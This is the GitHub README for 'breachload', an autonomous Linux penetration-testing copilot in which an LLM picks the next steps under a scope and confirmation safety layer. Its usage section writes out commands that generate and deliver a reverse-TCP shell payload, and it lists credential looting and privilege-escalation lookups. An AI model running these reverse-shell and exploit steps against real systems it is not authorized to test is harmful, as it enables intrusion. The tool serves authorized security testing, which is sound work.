Noxiidus/breachload
GitHub: Noxiidus/breachload
一款适用于 Linux 的自主渗透测试 Copilot,通过确定性安全层与 LLM 决策相结合,自动化驱动从侦察到报告的完整渗透测试流程。
Stars: 0 | Forks: 0
# breachload
适用于 Linux 的自主渗透测试 Copilot。引导从侦察到报告的整个测试过程:
运行工具,将其输出解析为结构化状态,决定下一步操作,
并生成工作笔记和发现结果 —— 同时通过确定性的安全层确保
每个操作都在授权范围内进行。
## 设计
- **确定性核心,LLM 负责决策。** 解析、状态和范围均由代码控制。
模型(Claude)仅决定下一步操作并解释原因。它绝不
解析原始输出,也绝不绕过安全层。
- **结构化状态,而非聊天历史。** 每台主机 / 服务 / 凭证 /
发现结果都是类型化的记录(`core/state.py`),可查询且可复现。
- **安全层是全自动化的支柱**(`safety/`):范围允许列表、
命令验证(二进制程序允许列表 + 无 shell 元字符),以及
风险分类器,该分类器会在执行侵入性/漏洞利用/破坏性操作时强制要求确认。
- **支持离线运行。** 在没有 `ANTHROPIC_API_KEY` 的情况下,启发式规划器仍可端到端地驱动
侦察,因此无需 API 即可对 pipeline 进行测试。
## 布局
```
breachload/
core/ orchestrator, state, config, llm planner, phases
safety/ scope, validator, audit
tools/ adapters (run + parse -> struct); nmap is the reference
analysis/ cve mapping, cross-service correlation (planned)
analysis/ version->CVE mapping, correlator, rule-based suggestion engine
exploit/ payload generation + delivery + offline payload library
data/ vuln knowledge base + offline payload/technique library
report/ findings -> markdown / pdf
web/ FastAPI + WebSocket dashboard (on_event seam)
engagements/ per-engagement scope + state + audit log
```
## 使用方法
```
pip install -e . # add [web] for the dashboard: pip install -e '.[web]'
export ANTHROPIC_API_KEY=... # optional; omit for offline heuristic mode
breachload auto engagements/example.yaml # one shot: recon -> plan -> report
breachload run engagements/example.yaml # auto-chain recon -> enum -> vuln
breachload status engagements/example.yaml # current known state
breachload suggest engagements/example.yaml # rule-based next steps (no API key)
breachload payloads --tag smb # browse the offline payload library
breachload gtfo find # offline GTFOBins privesc lookup
breachload loot engagements/example.yaml --scan linpeas.txt # privesc + creds from shell loot
breachload doctor # which tools/wordlists are installed
breachload flag engagements/example.yaml --scan loot/user.txt # capture a flag
breachload report engagements/example.yaml --pdf # Markdown (+ PDF) report
breachload serve engagements/example.yaml # run with a live web dashboard
# Exploitation(离线生成不受限制;delivery 经确认门控)
breachload payload engagements/example.yaml --payload linux/x64/shell_reverse_tcp \
--lhost 10.10.14.9 --lport 4444 --fmt elf
breachload deliver engagements/example.yaml --artifact --target 10.10.10.5
```
请参阅 [WALKTHROUGH.md](WALKTHROUGH.md) 获取从头到尾的完整靶机演练。通过 `breachload kb-import` 从 NVD 订阅源扩充 CVE
KB,并通过
`breachload.tools` entry-point 组添加您自己的扫描器(详见演练文档)。
## 自主性与安全层
测试任务 YAML 中的 `auto_threshold` 设置了在全自动模式下
无需询问即可运行的内容。侦察/枚举自动执行;任何被验证器
归类为高于阈值的操作(暴力破解、sqlmap 数据导出、exploit 执行)
都会暂停并等待确认。安全层管控操作落在**何处**以及**何时**
需要人工介入 —— 它不限制分析、payload 构造或
exploit 开发。
## 路线图
1. ~~脚手架:state + safety + nmap adapter + advisor loop~~
2. Adapter:whatweb, ffuf, nuclei, enum4linux-ng
3. 分析:version→CVE 映射、跨服务关联器
4. 带有确认门控的全自动化;紧急停止开关
5. 报告引擎
6. CTF 模式(激进的默认设置,flag 检测,轻量级报告)
标签:AV绕过, FastAPI, Python, XXE攻击, 实时处理, 密码管理, 插件系统, 无后门, 自动化红队, 逆向工具